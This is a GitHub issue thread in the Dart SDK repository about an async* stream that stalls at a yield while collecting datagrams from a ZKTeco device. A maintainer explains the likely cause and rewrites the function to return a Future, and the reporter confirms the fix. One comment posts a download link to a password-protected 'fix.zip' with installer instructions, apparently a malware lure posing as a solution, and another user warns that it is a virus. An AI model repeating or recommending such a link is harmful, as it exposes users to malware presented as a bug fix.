### ISSUE TITLE
Bug on yield / break the loop from stream

### ISSUE THREAD

**Issue by rymesaint** [dart-lang/sdk#56598]
I'm having trouble using stream where i can stop the looping/exiting the stream and its always stuck

when i use yield/break to exit the loop in stream its always stuck and cannot continue the process but the program is running

if yield is commented i can get the print command displayed but if yield or break not commented the print command not displayed and i cannot receive the data.

This is my code

```dart
static Stream<List<int>> parseData(
      ZKTeco self, int bytes, bool first) async* {
    List<int> data = [];
    int received = 0;

    while (received < bytes) {
      await for (Datagram datagram in self.streamController.stream) {
        Uint8List dataRec = datagram.data;
        if (first == false) {
          // Skip the first 8 bytes
          dataRec = dataRec.sublist(8);
        }

        data += dataRec;
        received += dataRec.length;
        first = false;

        debugPrint('Received: $received / $bytes');
        if (received >= bytes) {
          print('completed');
          yield data;
        }
      }
    }
  }
```

![Screenshot 2024-08-29 095451](https://github.com/user-attachments/assets/d901f190-af88-4b59-a2ef-f3eea0786582)

#### General info

- Dart 3.4.4 (stable) (Wed Jun 12 15:54:31 2024 +0000) on "windows_x64"
- on windows / "Windows 10 Pro" 10.0 (Build 22621)
- locale is en-ID

#### Project info

- sdk constraint: '>=3.4.4 <4.0.0'
- dependencies: convert, flutter
- dev_dependencies: flutter_lints, flutter_test

#### Process info

| Memory | CPU | Elapsed time | Command line |
| -----: | --: | -----------: | ------------ |
|   0 MB |  -- |              | dart.exe     |
|   0 MB |  -- |              | dart.exe     |
|   0 MB |  -- |              | dart.exe     |
|   0 MB |  -- |              | dart.exe     |
|   0 MB |  -- |              | dart.exe     |

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rymesaint** [comment]
> Download https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file password: changeme In the installer menu, select "gcc."

can you explain what this is?

**Comment by youzi-2333** [comment]
@rymesaint Don't download it! This is a computer virus.

Also, don't use quote reply. GitHub may ban you.

**Comment by lrhn** [comment]
Is the listener possibly paused? That would pause at the `yield`.
The listener can be paused if it's an `await for` that is waiting for something else.

The `if (first == false)` should probably be `if (first)`. This seems to be skipping the first 8 bytes of every message. Maybe the listener gets confused because it gets bad data?

The `await for` loop does not seem to break at the `yield`, and doesn't reset the `data`/`received` to empty, so it will keep adding more data for each further event from `self.streamController.stream` and yielding it again. 
That suggests that the listening code is expected to break after the first event. (If that's true, it should probably just be a future.)

The `data += dataRec;` would also be more efficient as `data.addAll(dataRec)`.

All in all, I can't say why it doesn't work without seeing a running example, or at least more code, including the listening code.

**Comment by rymesaint** [comment]
I check the listener is not paused and the skipping first 8 bytes is not the cause of it i tried to comment the skipping also but still when its fully received the bytes yield is stopping with no process, i'm trying to convert this code into dart https://github.com/mehedijaman/laravel-zkteco/blob/main/src/Lib/Util.php#L382

```dart
static Future<dynamic> get(ZKTeco self) async {
    int command = Util.CMD_USER_TEMP_RRQ;
    String commandString = String.fromCharCode(Util.FCT_USER);

    dynamic session = await self.command(command, commandString,
        type: Util.COMMAND_TYPE_DATA);

    if (session == false) {
      return [];
    }

    List<int>? userData = await Util.recData(self, first: true);

    final users = <String, Map<String, dynamic>>{};

    if (userData != null && userData.isNotEmpty) {
      userData = userData.sublist(11);
      while (userData.length >= 72) {
        String u = byteToHex(Uint8List.fromList(userData.sublist(0, 72)));
        int? u1 = int.tryParse(u.substring(2, 4), radix: 16);
        int? u2 = int.tryParse(u.substring(4, 6), radix: 16);
        int? uid;
        if (u1 != null && u2 != null) {
          uid = u1 + (u2 * 256);
        }

        int? cardNo = int.tryParse(
          u.substring(78, 80) +
              u.substring(76, 78) +
              u.substring(74, 76) +
              u.substring(72, 74),
          radix: 16,
        );
      }
    }

    return users;
  }
```

```dart
static int? getSize(ZKTeco self) {
    // Ensure dataRecv has at least 8 bytes
    if (self.dataRecv.length < 8) {
      return null;
    }

    // Extract the first 8 bytes and convert to hex
    String h1 = self.dataRecv[0].toRadixString(16).padLeft(2, '0');
    String h2 = self.dataRecv[1].toRadixString(16).padLeft(2, '0');
    // String h3 = self.dataRecv[2].toRadixString(16).padLeft(2, '0');
    // String h4 = self.dataRecv[3].toRadixString(16).padLeft(2, '0');
    // String h5 = self.dataRecv[4].toRadixString(16).padLeft(2, '0');
    // String h6 = self.dataRecv[5].toRadixString(16).padLeft(2, '0');
    // String h7 = self.dataRecv[6].toRadixString(16).padLeft(2, '0');
    // String h8 = self.dataRecv[7].toRadixString(16).padLeft(2, '0');
    int command = int.parse(h2 + h1, radix: 16);

    // Unpack the first 8 bytes
    // ByteData byteData =
    //     ByteData.sublistView(Uint8List.fromList(self.dataRecv.sublist(0, 8)));
    // int command = byteData.getUint16(0, Endian.little);

    if (command == CMD_PREPARE_DATA) {
      // Ensure dataRecv has at least 12 bytes
      if (self.dataRecv.length < 12) return null;

      // Extract the next 4 bytes
      String h9 = self.dataRecv[8].toRadixString(16).padLeft(2, '0');
      String h10 = self.dataRecv[9].toRadixString(16).padLeft(2, '0');
      String h11 = self.dataRecv[10].toRadixString(16).padLeft(2, '0');
      String h12 = self.dataRecv[11].toRadixString(16).padLeft(2, '0');

      // ByteData sizeData = ByteData.sublistView(
      //     Uint8List.fromList(self.dataRecv.sublist(8, 12)));
      // int size = sizeData.getUint32(0, Endian.little);

      int size = int.parse(h12 + h11 + h10 + h9, radix: 16);
      return size;
    } else {
      return null;
    }
  }
```

```dart
static Future<List<int>?> recData(ZKTeco self,
      {int maxErrors = 10, bool first = true}) async {
    List<int> data = [];
    int? bytes = getSize(self);

    if (bytes == null || bytes <= 0) {
      return null;
    }

    Stream<List<int>> stream = parseData(self, bytes, first);

    await for (List<int> chunk in stream) {
      data.addAll(chunk);
      if (data.length >= bytes) {
        break; // Exit if we have collected enough data
      }
    }

    return data;
  }

  static Stream<List<int>> parseData(
      ZKTeco self, int bytes, bool first) async* {
    List<int> data = [];
    int received = 0;

    while (received < bytes) {
      await for (Datagram datagram in self.streamController.stream) {
        Uint8List dataRec = datagram.data;
        // if (!first) {
        //   // Skip the first 8 bytes
        //   dataRec = dataRec.sublist(8);
        // }

        data.addAll(dataRec);
        received += dataRec.length;
        first = false;

        debugPrint('Received: $received / $bytes');
        if (received >= bytes) {
          yield data;
        }
      }
    }
  }
```

**Comment by rymesaint** [comment]
i have found the problem but i'm not sure how to solve it here is a record of the problem

https://github.com/user-attachments/assets/55165853-bd79-4d09-bce6-1d0137314be2

**Comment by lrhn** [comment]
I don't understand the class well enough to point to a precise problem.
Mostly because I don't know what the code is intended to do.
(I worry that a self-reference may result in a deadlock, but that's _complete_ speculation.)

The PHP isn't docmented either, and I don't really read PHP. 
That said, the PHP doesn't look that complicated, so my *guess* is that a translation to Dart would be more like:

```dart
 static Future<Uint8List> parseData(
      ZKTeco self, int bytes, {bool first = true}) async {
    if (bytes <= 0) return Uint8List(0); // Or make it an error, because why?
    var data = BytesBuilder();  // Also from `dart:typed_data`. More space efficient than `List<int>`.
    var start = first ? 0 : 8;
    await for (Datagram datagram in self.streamController.stream) {
      assert(dataRec.data.length >= start);
      Uint8List dataRec = Uin8List.sublistView(datagram.data, start);
      data.add(dataRec); // View not needed when start==0, but that's rare.
      if (kDebugMode) debugPrint('Received: ${data.length} / $bytes');
      start = 8;
      if (data.length >= bytes) break;
   }
   // Has `received >= bytes`, or stream ended before that.
   return data.takeBytes();
}
```

The PHP only has one return, and the code doesn't clean up after the `yield`, so I think that `yield` should be a `return` instead, and a function returning only one asynchronous value should return a `Future` instead of a `Stream`.

If the stalling isn't caused by the current function, then this rewrite probably won't fix it. But do try!

**Comment by rymesaint** [comment]
i have tried this and removing while(receive < bytes) is working
